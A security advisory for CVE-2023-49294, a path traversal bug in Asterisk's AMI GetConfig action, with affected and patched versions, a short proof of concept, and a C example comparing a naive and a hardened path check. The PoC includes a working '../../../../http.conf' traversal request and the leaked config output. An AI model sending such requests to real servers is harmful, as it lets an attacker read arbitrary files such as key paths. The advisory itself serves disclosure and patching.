
CVE-2023-49294: Path traversal via AMI GetConfig allows access to outside files

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read arbitrary files via the AMI GetConfig action even when live_dangerously is not enabled. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk 18.9-cert6, contain a fix for this issue.

Package

asterisk (Asterisk)

Affected versions

<= 18.20.0

<= 20.5.0

= 21.0.0

Patched versions

18.20.1

20.5.1

21.0.1

certified-asterisk (Asterisk)

Summary

It is possible to read arbitrary files via AMI even when live_dangerously is not enabled.

Details

CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

https://owasp.org/www-community/attacks/Path_Traversal
https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757

PoC

cp /config/asterisk/default/http.conf /

This is denied as expected:

Action: GetConfig
Filename: /http.conf
ActionID: 09235013

Response: Error
ActionID: 09235013
Message: File requires escalated priveledges

This request should also be denied, but it succeeds:

Action: GetConfig
Filename: ../../../../http.conf
ActionID: 09235015

Response: Success
ActionID: 09235015
Category-000000: general
Line-000000-000000: enabled=yes
Line-000000-000001: bindaddr=[::]
Line-000000-000002: bindport=8088
Line-000000-000003: tlsenable=yes
Line-000000-000004: tlsbindaddr=[::]:8089
Line-000000-000005: tlscertfile=/etc/asterisk/keys/fullchain.pem
Line-000000-000006: tlsprivatekey=/etc/asterisk/keys/privkey.pem
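
The PoC shows an absolute filename being rejected while a relative one built from `../` components is served. The C below is an added example, not Asterisk's code: `naive_is_outside` is an assumed model of the pre-fix behaviour seen in the PoC, and `escapes_config_dir` is a hypothetical hardened lexical check.

```c
#include <stdio.h>
#include <string.h>

/* Assumed model of the pre-fix behaviour seen in the PoC: only a leading
 * '/' marks the file as outside the configuration directory. */
static int naive_is_outside(const char *filename)
{
    return filename[0] == '/';
}

/* Hardened lexical check: walk the components and track depth relative
 * to the configuration directory. Returns 1 if the path is absolute or
 * ever climbs above the base. Symlinks are not resolved here; a
 * filesystem-backed check would also compare realpath(3) output. */
static int escapes_config_dir(const char *filename)
{
    int depth = 0;
    const char *p = filename;

    if (*p == '/')
        return 1;
    while (*p) {
        size_t len = strcspn(p, "/");
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0)
                return 1;
        } else if (len > 0 && !(len == 1 && p[0] == '.')) {
            depth++;
        }
        p += len;
        while (*p == '/')
            p++;
    }
    return 0;
}

int main(void)
{
    /* First two names are the PoC's; the last two are constructed. */
    const char *names[] = { "/http.conf", "../../../../http.conf",
                            "sub/../http.conf", "sub/../../http.conf" };
    for (size_t i = 0; i < sizeof(names) / sizeof(names[0]); i++)
        printf("%-24s naive=%d hardened=%d\n", names[i],
               naive_is_outside(names[i]), escapes_config_dir(names[i]));
    return 0;
}
```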

Impact

Allows arbitrary files to be read.

Related news

Debian Security Advisory 5596-1

Debian Linux Security Advisory 5596-1 - Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
